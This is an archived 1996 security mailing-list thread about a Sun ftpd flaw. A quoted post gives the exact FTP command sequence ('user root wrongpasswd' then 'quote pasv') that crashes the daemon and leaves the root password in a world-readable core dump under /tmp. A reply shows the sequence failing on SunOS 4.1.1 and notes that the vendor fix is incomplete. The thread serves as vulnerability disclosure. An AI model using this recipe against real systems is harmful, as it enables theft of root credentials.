Doesn't work for me ... SunOS 4.1.1
SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>
and no core in /tmp
John
------------------------------------------ original message
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
SunOS 5.5:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
-Martin
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so the seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
Received on Oct 16 1996
Intro
